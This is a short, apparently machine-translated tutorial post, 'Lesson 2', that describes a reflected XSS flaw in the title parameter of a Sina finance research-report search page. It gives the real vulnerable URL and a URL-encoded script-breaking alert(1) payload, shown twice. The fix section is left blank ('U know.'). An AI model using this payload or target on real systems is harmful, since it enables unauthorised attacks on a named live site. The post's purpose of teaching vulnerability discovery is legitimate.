Lesson 2 http://www.bkjia.com/Article/201301/186364.html
Well. I found this directly when I was looking for the first lesson. Anyway, the beginning is very simple direct output in the source file, there is no filter reflected XSS detailed description: vulnerability address: http://vip.stock.finance.sina.com.cn/q/go.php/vReport_List/kind/search/index.phtml? Symbol = 002698 & orgname = & industry = & title = & t1 = all write a string of characters at the title and view the source code. Take 1111111111 as an example: we can see that it is directly output between JS scripts. Add closed front, test passed, no filter: http://vip.stock.finance.sina.com.cn/q/go.php/vReport_List/kind/search/index.phtml? Symbol = 002698 & orgname = & industry = & title = 111111111% 3C/script % 3E % 3 Cscript % 3 Ealert % 281% 29% 3C/script % 3E & t1 = all http://vip.stock.finance.sina.com.cn/q/go.php/vReport_List/kind/search/index.phtml? Symbol = 002698 & orgname = & industry = & title = 111111111% 3C/script % 3E % 3 Cscript % 3 Ealert % 281% 29% 3C/script % 3E & t1 = all multiple sub-site pages, perform a full check.
Solution:
U know.